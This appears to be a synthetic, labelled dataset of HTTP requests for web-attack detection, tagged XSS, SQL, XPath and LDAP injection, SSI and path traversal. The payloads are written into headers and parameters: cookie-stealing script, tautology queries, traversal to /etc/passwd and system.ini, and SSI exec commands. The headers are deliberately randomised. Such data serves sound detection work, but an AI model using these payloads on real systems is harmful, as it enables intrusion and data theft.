Accept-Charset: iso-8859-5;q=0.9, x-mac-arabic;q=0.3, x-mac-hebrew, iso-8859-4
Accept-Encoding: deflate, gzip;q=0.3, compress, identity;q=0.9
Accept-Language: afdmh-npkin, spomenAs-i;q=0.1, uLhp-ecoa, unustI-uptIsokN
Cache-Control: max-stale
Client-ip: 66.144.251.40
Cookie: adusc=75263;4rurao=tNhtieg;5@.OeHv=tshpb;QiFKKSreplacedD=)
Cookie2: $Version="480"
Date: Tue, 12 Aug 08 24:24:07 GMT
ETag: "8nV1kWDYJ_ZLBXPvCT"
Expect: 100-continue
From: hIi5nNeb@tiou4naa.uk
If-Modified-Since: Sat, 04 Nov 06 15:33:36 GMT
If-Unmodified-Since: Sat, 06 Aug 05 12:36:23 GMT
If-Match: *
If-None-Match: "jQhQPQKrPY8XENPTuW"
If-Range: *
Max-Forwards: 350
MIME-Version: 8.6
Pragma: s='ioee'
Proxy-Authorization: dler dcyii=syes
Authorization: Basic aGhhMTplaHpo
Range: 0895-83944,521-,-11650
Referer: http://www.rdusi29.cz/AaLshgE/tnpeu0.css
TE: trailers,gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.5 (compatible; MSIE 3.4; Win 9x; amyn; mauesL)
UA-CPU: MIPS
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 278x2627
Via: HTTP/2.0 www.oru4eTEt.gif, 5.4 153.14.158.205, 8.5 www.ce2i.gif
Transfer-Encoding: puverY
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 013 www.7sm6.png:35283 "lsedoeai3ucu" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 4796093744
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40519
Start - Id: 35720
class: XPathInjection
GET /Ma5wn/eFjaloa64.jpg?AU@from.rv=oRlei&ctnNtrans=141769&mttgher=eBXh_&ns=668458&tyTulhgAremhw=iEVU-r2qND&WX@wB5=698445&euraaeitgaanide=-oe&Cp.IsgW=unsaia%2Fwana%2Fhee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D+++or+++++%27iosrheTo%27++%3D++%27&smhte1yl=t%27e&evhonnn=ethli%26i%27if+nshoil&hOlau7rhbxaf=gfloe4ten%24d&jreplaced@cmdmJ=0avibodyl HTTP/1.0
Host: 99.134.175.222
Connection: keep-alive
Accept: video/quicktime;q=0.5, text/plain;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress, gzip, identity;q=0.9, compress;q=0.0, deflate;q=0.3
Accept-Language: us1-oi;q=0.5, o1sea08o-rgire;q=0.5, nead-i;q=0.1
Cache-Control: max-stale=87
Client-ip: 182.247.215.24
Cookie: suctdehsisY=9o= 
Cookie2: $Version="10"
Date: Sat, 03 Dec 05 07:17:46 CET
ETag: "9TLGw4cFfJoMYxvIefp"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Sun, 12 Aug 07 01:33:56 UTC
If-Match: "EsiX0-OGyT@DtyI"
If-None-Match: *
If-Range: Sun, 01 Feb 09 04:20:41 UTC
Max-Forwards: 797
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aXg5bm5mbmVyc2hlOWV3aGh0bDI2YmNPaWJ1ZW9ycHlybmUybmVoaWhlbm9oYQ==
Range: 5225-,8-9,1-
Referer: /rtIistu1/ssia8oH/lfatobeu/uaIs/Z4etl.conf
TE: chunked;q=0.9,chunked
Trailer: TE
User-Agent: tabrkbsownoMpttDh
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: 5.3 www.Sw2steew.htm, FTP/1.8 www.seft.gif
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35720
Start - Id: 48101
class: XSS
GET /dmmoiEiHasjpttsolola.dll?0edb7vtiui0o6si=92752442&2hyr=9Jp.ChfvdB&269oSypMB=lha&nq=hnnk%22++%3E%3Cbody%2520onload%3Dalert+%28document.cookie%29%3B++++%3E&ereart4ossdlc=0eoKnexecnCsfrtl HTTP/1.1
Host: 182.203.28.63
Connection: keep-alive
Accept: audio/basic, text/html;q=0.6, audio/x-wav
Accept-Charset: windows-1257, x-mac-ce;q=0.5, iso-2022-kr;q=0.4, cp-932;q=0.2, euc-tw
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=7
Client-ip: 148.235.193.134
Cookie: ay=Ra;narc=3tooe2retaen5vkf;Lcwdsdo3=97907592;SixnOpasaTopsBl=Siario ;ewottfietrt6=558;to=71161
Cookie2: $Version="657"
Date: Fri, 08 Oct 04 19:52:00 UTC
ETag: W/"AKr90LoeB4iWhbN"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Mon, 26 Nov 07 02:35:05 CET
If-Unmodified-Since: Sun, 07 May 06 03:14:47 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 37
MIME-Version: 8.9
Pragma: mooeci8=awue
Proxy-Authorization: nii4 fncehnss=cd2a
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: http://www.lqSr.uk/qSse.php3
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: iermbTA4e (oA_6sJgXc)
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: FTP/1.4 www.efor.jpeg:559
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48101
Start - Id: 35352
class: SqlInjection
GET /wErkevI.js?t5t=t%5DB&da=8146751&etek2=eo9Ltesaamrh7kh&y4er=r3tHne&tTgRn4otrse=ldottt2isiri&Jg3@DdoB=t9pLard37iaE6&utiet=73bXbThFD6Th&7i=Tm&l2pshthic5aqo=00&oumj=525425103&ge=2077320&n617sthaho=%27++++OR+++++%27Du3rfwxott%27+++++BETWEEN++%27R%27++AND+++++%27T&xoroe7=20438&mm=3226877772&7rb=gneoSufzle HTTP/1.0
Host: www.m5oae3.net
Connection: close
Accept: application/*, video/quicktime
Accept-Charset: iso-8859-9, cp-950;q=0.5, iso-8859-6;q=0.8, x-mac-arabic
Accept-Encoding: compress;q=0.6, identity, compress;q=0.3
Accept-Language: ntu0-o9n9jLa;q=0.3
Cache-Control: max-age=7870
Client-ip: 85.208.223.94
Cookie: XmPIh7mexecircpIZ=vm3;idiyfihuOOyh=vhlimtnhCszoi;nsy=nrnSssNin$[
Cookie2: $Version="914"
Date: Wed, 28 Dec 05 09:12:24 GMT
ETag: W/"_UGz7wT0hbLk_psH8NC"
Expect: senlwad
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Mon, 02 Jul 07 24:19:38 GMT
If-Unmodified-Since: Thu, 28 Jan 10 07:12:04 CET
If-Match: "uHkTIqG13BAnotizka6W"
If-None-Match: "Nns9@De.@jyn2R1tKb4"
If-Range: Sun, 31 May 09 02:05:32 GMT
Max-Forwards: 07
MIME-Version: 6.8
Pragma: sc='erAue'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: NTLM bk5lb3JkZTNvb2lpMmllMW9lZWVoYmdscnRpaG91bG1oMnV0c3R0YWNtb2RlZg==
Range: 1609-18413
Referer: http://www.0rroD.it/aqwten/t0exw/siorh5i.txt
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/7.4 (X11; U; Solaris 2.9; il-ne; rv:7.5.3) Gecko/14658822
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: 2.9 www.gfadl.gif
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 146 169.183.209.232 "soenZxa4uxWy" "Thu, 10 Jun 04 15:18:24 GMT"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35352
Start - Id: 40353
class: SSI
PUT /rrdg/WwNH/h3vmA/Nt2tscnsa/7xuxmlTz9CTA/fd/ehFS-Plq9EnW/napegkgd/eeaiHg0zoEa3rnFmt/nu4RWRh/u9lrionqletgUe/t-9HvACzRW.jpg? HTTP/1.1
Content-Length: 215
Content-Language: qpe,nm4,abhvsnem
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 31 Aug 05 22:58:52 CET
Host: 62.205.8.114
Connection: close
Accept: */*
Accept-Encoding: *;q=0.8
Cookie: 4bt2ch0itrna=<!-- #exec     cmd="c:\progra~1\xglbhcA\tj\toeswwy.exe   d:\eiutbnoPh\www.ndnesi.org\eeiiesrgt\database.mdb  /x   exporttofoxpro"-->;@TLzSuoKA_Mw=alikeoein3;Yar2aAiEkeUAr=tf2tG-lhenes5;mtcpeiee=f ;nzsabzh7oe7se=961080;EtairmRbesaue=nucehsdmni|Le
If-Range: "16KXDk.OigyJLnTBY"
Max-Forwards: 801
MIME-Version: 1.6
Referer: /ua6ugomj/eihlo2el.jsp
TE: trailers,chunked
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 1.9; aa-4i; rv:9.9.4) Gecko/79122925
Transfer-Encoding: compress
Warning: 571 62.155.20.163 "snABea0wanbiwajt8q" 
~~~~~: ~~~~~~~~~~~~~~~~~

qea=82&oah1=653208&erna=tebh\mn3jbihaNY&6htdOrlowbaaeo=]we]&Twnnmghasn=rnamkT&eirleyhmin=0&s24eodu7sal2Inw=i1oIupdatenidH@7htacces |?Oe style9&ljeoea=38&A9aiIrfdasu=lB9reosyD&leioaaHqshl5fgf=telnet= ny

End - Id: 40353
Start - Id: 49658
class: XPathInjection
GET /IhmuREomrT.jpg?carnqrndef=082++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++276%3D&lpOye=8VA HTTP/1.0
Host: www.oynte.fr
Connection: 6e2obo
Accept: video/*;q=0.1, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: naze-0o;q=0.7, etnoe-nSo4oA, iuocie-n;q=0.5
Cache-Control: min-fresh=703
Client-ip: 248.26.123.88
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Wed, 15 Nov 06 16:00:15 CET
ETag: W/"tMSsJ3bLqozrYkMJ"
Expect: httd
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Mon, 23 Aug 04 01:48:51 UTC
If-Match: "ztLNDQteWb3GoLPJuof"
If-None-Match: *
If-Range: "UR2K2DBnbkqhR.d@B"
Max-Forwards: 18
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 7083-858216,-723,8872-
Referer: /a3dhn6/raojaoio.asmx
TE: trailers,gzip;q=0.6
Trailer: Date
User-Agent: taTeoe
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
Via: 5.4 129.10.237.16
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 369 www.8nrabs.html "Ssfefi" "Wed, 10 Oct 07 11:26:24 CET"
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49658
Start - Id: 42420
class: SqlInjection
GET /itoggejk0nI8ees/n0wfeysUqlgl/mffg1cbIxFL/C4m0/ZVinclude8kgMt/AFhe3YHwfoJ5imgj/aV_EL-r@S2mx4/ei.tiff?0tusieefUttof=OR++++%27aTNju%27++BETWEEN+++++%27R%27+++AND+%27T%27&edntc1Ustee3ho=9363876&vinputY.openstdinlh6lsG2=%3Cufwts2qcpin%27r+c&iqzezoren=p&um3e=31&6dnetrsbeedrWmt=usrl%2B+ilm%7Eb%3Ce&t3eThkD=eEylsgaptmwiinas&ndeh=ntiaa&eeu6ir8hmTfef=aei59ts%25i6i+rhx%7Eei&TdoDiprieu=iettm%3F&RutXnR0dQ3=eSRx9 HTTP/1.1
Host: 57.195.227.45:81
Connection: spek
Accept: */*
Accept-Charset: iso-8859-8-i, windows-1257, windows-874, cp-932;q=0.0, ks_c_5601-1987;q=0.5
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: GthlR-atesei, 45orrtei-esweO7n;q=0.4, Ob-fn;q=0.2
Cache-Control: min-fresh=2156
Client-ip: 88.187.116.188
Cookie: nut4c3Ets=97140641;1nlelpcarofostr=Ld/i
Cookie2: $Version="157"
Date: Thu, 13 Mar 08 20:12:21 GMT
ETag: "0aLhFbG8X1U5SJN"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Tue, 30 Sep 08 09:05:02 CET
If-Unmodified-Since: Tue, 30 Mar 04 08:10:04 GMT
If-Match: *
If-None-Match: "pNN1.vyaxQzf9kZ"
If-Range: Thu, 12 Jul 07 13:56:14 UTC
Max-Forwards: 6127
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: 005696-6624,4-
Referer: /rtdnege/Aoete.nsf
TE: trailers,trailers,deflate;q=0.4
Trailer: Trailer
User-Agent: Mozilla/4.9 (X11; U; Open BSD i386 6.2; Ga-us; rv:5.9.1) Gecko/78611372
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: HTTP/8.3 www.aiina.png, HTTP/7.8 www.rttAhry.gif, FTP/4.0 168.112.34.200
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 520 206.128.137.82 "k8cmwoU" "Thu, 21 Jul 05 08:42:03 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42420
Start - Id: 46040
class: PathTransversal
GET /aD9w22B2QF2YzrZdV_t/siy2sytsygtgvgitHt/@eE33ehcpwDAncCs.bin?WEV1QcF51O=eJBys2nH&hboot.iniT6o=9&emm=eojrI5wh9bhleiarrn&y-isi0r9PEshutdown8=a0aim24aa6shutdownSahr+2m&yhsldr=7&fenn=%2FeaDa&ssindsih=82&mbe=818266100&iemRdarreAfeeh=o+b&MEmaa=9H3%24t%3DIs HTTP/1.1
Host: www.ytdoVpik.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-roman;q=0.1, windows-1253;q=0.2
Accept-Encoding: *
Accept-Language: ../../../../../../../../../etc/passwd
Cache-Control: only-if-cached
Client-ip: 243.10.98.97
Cookie: iinatoqy1=);eierehs=Arlinsertm;oehqh=20436595;afehzefx=h"tuki| a"6mriobject
Cookie2: $Version="112"
Date: Thu, 26 Jul 07 18:34:06 CET
ETag: W/"WDieNzqnzdhyTvCJ1"
Expect: na2smeai
From: t8eatheo@nnmabyy.org
If-Modified-Since: Sun, 25 Dec 05 23:04:40 GMT
If-Unmodified-Since: Sun, 02 Nov 08 18:10:53 GMT
If-Match: *
If-None-Match: "YqpCAnBsdPILs-RwmLR"
If-Range: Fri, 01 Jan 10 07:59:10 GMT
Max-Forwards: 791
Pragma: no-cache
Authorization: ri5xnr gMenz=qdslean
Range: 96418-,-1,193-
Referer: /mhssr.swf
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 2.6; ej-dE; rv:7.0.9) Gecko/60167175
UA-Pixels: 376x6038
Via: FTP/1.3 128.188.103.187
Upgrade: n41se/5.7
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46040
Start - Id: 37743
class: LdapInjection
GET /0V/teyZS7eR@Rgg.ZY.n/0kKqoUA4/o9nghinidinelb/UxhsYtOtbt.tiff?iravsnoggee=ttmihtpass&26IB3.q989h-=ulocationn%3Da%26toi4shutdownOi&wPEv=%29++%28++++%7C+++%28mocec%3DteTdM*%29&ldmTtn=pnph-+%3E6locationlndee53o&ooa=a+ko+%3ATvioo%5B7e&Tn9unionbOZ_rm8f6=ppA_XwnnxSY&wa6txdsaan3enN=child%7Cgi6lgra HTTP/1.1
Host: 8.22.199.48
Connection: close
Accept: audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 104.103.102.172
Cookie: 5in6set=$pho96rrbHttasr location;Ytsit=9692834
Cookie2: $Version="3"
Date: Tue, 12 May 09 22:20:29 UTC
ETag: "O7n8cheml6sy0-OowP8"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 07 May 06 02:23:23 CET
If-Unmodified-Since: Mon, 07 Apr 08 22:11:30 CET
If-Match: "72I_uXwtGbmvnQHen"
If-None-Match: "Yd2TSivJu2g5OMVR7"
If-Range: Mon, 21 Dec 09 23:37:20 UTC
Max-Forwards: 56
Pragma: ntps=s0ei
Authorization: Digest cnonce="rIeJoay"
Range: 79793-4
Referer: http://www.aie2dar.org/Iettz/eBBHAvrE.cgi
Trailer: Date
User-Agent: Mozilla/0.5 (compatible; mtisIe; Win 9x; nryskf; sseh; enwdnao)
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Linux
UA-Color: color32
Via: 5.6 www.felwCer.htm, 4.6 57.174.87.134:7512
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37743
Start - Id: 42052
class: SqlInjection
GET /stqVv66@D1qrzhQsIM/4gfsa4ntonafoAV/aoyfeoh/Rl64aSWkCWTY/is@XOmYThr/bf5vWs6efts6g1k/kHFovqy/Foexecbu/f-ZbN/tU-styleimWMdnHyQA.css?rElzeiotfi19=hlohihbehttpsrh&ac8tuegib=07005&mi=nXx%40C&hosomtbs=8448&Lku4q05=eJ5l6BZUUa&hims1znqnRt=77652&oixhtmnd3ereimp=162510&0n=%27+OR++++%27soaa9e%27+++BETWEEN++++%27R%27++++AND+++%27T&Hor0D=rnsii&etcuIkX8z.rxl=rHds HTTP/1.0
Host: www.ejmk.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: blokwcle='seudae'
Client-ip: 240.50.140.120
Cookie: rgsehrtnl3EaR=375728;yhea=j vls2apshsnullNformc;tnUeN3ednErtN=be.;epiof=8Ae
Cookie2: $Version="46"
Date: Fri, 03 Nov 06 18:11:54 UTC
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Thu, 06 Mar 08 05:50:33 CET
If-Unmodified-Since: Sun, 24 Jan 10 12:27:10 CET
If-Match: "DDm-B.rrV9K5b@.khgQ"
If-None-Match: *
If-Range: *
Max-Forwards: 340
MIME-Version: 8.6
Pragma: hohu=eOrbE
Proxy-Authorization: Digest nonce
Authorization: sEtO ec0eDm=Tolrtj
Range: -256
Referer: /wdytAhO/hnoeEIza/ghii0e.swf
TE: gzip;q=0.2
Trailer: Pragma
User-Agent: Mozilla/3.8 (compatible; MSIE 1.1; Solaris; ssdo8Oaor; dreat)
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 307x472
Via: 7ee/6.1 196.216.120.158, FTP/0.0 www.1tmhapa.html, 6.7 163.28.121.133:7083
Transfer-Encoding: hh8e
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42052
Start - Id: 39317
class: SSI
GET /hng2/xMZb2K3VrCMvJ9kRD/bu/Z-Ps7winntH/XvCFtSe.7r2/Sndoa1smNSttopr/MEAADOlt.cAaHSy/pLt/tO6APyqwISO/hPysM/YEJC_2iZtHlogu/u_hBelK_0d-.png?S6ui99XIVpn=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.yi7uxl.biz
Connection: egeypos
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: biai-tt;q=0.4, e0erei-m;q=0.7
Cache-Control: no-transform
Client-ip: 192.88.225.132
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="115"
Date: Mon, 10 Nov 08 12:25:43 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: aetxo=redzc
From: oQtOA@ihnixcoe.fr
If-Modified-Since: Wed, 23 Dec 09 09:17:33 GMT
If-Unmodified-Since: Thu, 25 Dec 08 16:03:17 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 03:18:49 CET
Max-Forwards: 4518
MIME-Version: 9.8
Pragma: nx8aih='sy'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest realm
Range: 326-,2201-0740,2-99478
Referer: http://www.qoexHl8.uk/S1ele/sxae/dnfdoin/tyhOine/ohht49.msf
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: isniaigi/6.6.0.5.6
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: inler
Upgrade: eseht/3.5, trmE/1.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39317
Start - Id: 45826
class: PathTransversal
GET /bgAofRyrjetsseor7a/NzJ7x/eycnw4twvAMr0bsjgh/aJZUWjLF/eycopiFacftdbitSne/ajmWz7QN/G160/tkfgw2sstdisag5oncs/iaplC6dsia.sh?t2n.i-2Xo=aretaOSehtcg23q&cs=obID&EO=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&ae=hush%2F%3Ace&9geAowd=r6eu+androp&euigteoce=41064&deafana=32107760&wWoDvhlthnisTdh=jh+iuItane%5Dotsllee&ev=75938&naLe3kmaete=5&hHeteEoe8ancsg=tj HTTP/1.1
Host: www.flNpcletne.st:5
Connection: keep-alive
Accept: audio/*, video/mpeg;q=0.9, video/*
Accept-Charset: big5;q=0.5, koi8;q=0.7, windows-1254
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=73
Client-ip: 106.190.4.232
Cookie: isCniOnDei=154;GipVto1=7?ge>|;ceooeren0=4;fspmodcta=yRbQ.x;je-2Qsf=b@a+:sfolrk0emle
Cookie2: $Version="357"
Date: Wed, 20 Dec 06 21:18:12 UTC
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
From: Ea5ne@1d8iisnai.ch
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Apr 05 08:34:55 CET
Max-Forwards: 402
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM eHNuc2VtaWFyYXlpZG5hZGYxZVdOb2NtZXNvZnNzb2tubXdz
Range: 09236-
Referer: /soeM8Eo/hcto8ee/sniejt/ckske.wav
TE: chunked,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (compatible; lrapmrlnx; Linux i586; Y3oetiOs)
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Transfer-Encoding: compress
Upgrade: RBj0/3.6, ta3oe/2.8
Warning: 559 www.tI7c.css "nAtao" 
X-Serial-Number: 25397478987579
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45826
Start - Id: 35784
class: XPathInjection
GET /Ao5rselmodied.tiff?eedh0=esegt7%2Frcn%2Fasuaoh%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D++++or+++%27atrldon%27+++%3D+%27&seHobnehoa=nnoHniitbnc&at=Hpu9Y4rTneqnee&sechm=j-Y5tZnFDEk HTTP/1.1
Host: 210.140.45.97
Connection: Aoimi
Accept: */*
Accept-Charset: us-ascii, x-mac-chinesetrad, x-mac-japanese;q=0.4, x-mac-chinesetrad;q=0.4, windows-874
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 200.26.183.185
Cookie: thwfrBeFa=ovLpI;shtwliVge8ht=4;e5jsse=YeDeh;ageone9=rY5b
Cookie2: $Version="724"
Date: Sun, 10 Jul 05 19:49:09 GMT
ETag: W/"1x1qmvlx1fM-Jj8"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: debl@hectstms.net
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Sun, 25 Nov 07 19:13:50 CET
If-Match: "CLGYTEeTI8-h2dVGGjt"
If-None-Match: "sFo1KmTAdBPMJ_.Myge"
If-Range: "v_EoAoda01WKSsSF4QUh"
Max-Forwards: 277
MIME-Version: 5.9
Pragma: eh='hu5si'
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest username="TtgQNse"
Range: -777
Referer: /gfrer/n2snnlra/uhrnrhz/ah3tm/wjgjad.png
TE: trailers,deflate;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/5.1 (compatible; Konqueror/0.2; SunOS sun4u; cxtbytt)
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 072x540
Via: FTP/3.0 48.127.230.238, 8.2 98.232.18.124
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 506865883977236095
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35784
Start - Id: 37339
class: LdapInjection
GET /rkpP-1@Ja5QWGhvu/oQ8Fj4CZIXFTgQQ/atienwme/eren/ilNT87/tnrjmhseivugA2Insha/wranr.jpeg?elhmtna3aas=5946&ap6=979CSwP3&ihtrbr=cO0Kwv51QYt&pr5o=3n+9&empp=065465 HTTP/1.0
Host: www.eOoene.st
Connection: seesr
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: lhacs)(|    (tdlh=*)
Accept-Language: uAsiatem-Ia, o-f;q=0.3, krevn-naamue;q=0.2, regoio-lfy, L1ht-o
Cache-Control: only-if-cached
Client-ip: 131.232.136.148
Cookie: fcjoydip=ecrdgns;urq4=we@a?thaving;imp0dom
Cookie2: $Version="7"
Date: Thu, 13 Jul 06 15:54:03 CET
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: elbo@eieuetfntT.fr
If-Modified-Since: Sun, 10 Oct 04 19:26:14 GMT
If-Unmodified-Since: Wed, 15 Sep 04 20:55:09 CET
If-Match: *
If-None-Match: *
If-Range: "6xH2@5W0ssXsZjhHKQV"
Max-Forwards: 44
MIME-Version: 7.1
Pragma: 7geb='yszaafie'
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: 83le wArhSocv=ReiigfTl
Range: 54145-,-678850
Referer: /nesd0m/nhLqs.swf
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/4.4 (X11; U; Unix 1.3; nt-se; rv:9.6.1) Gecko/41423437
UA-CPU: 68000
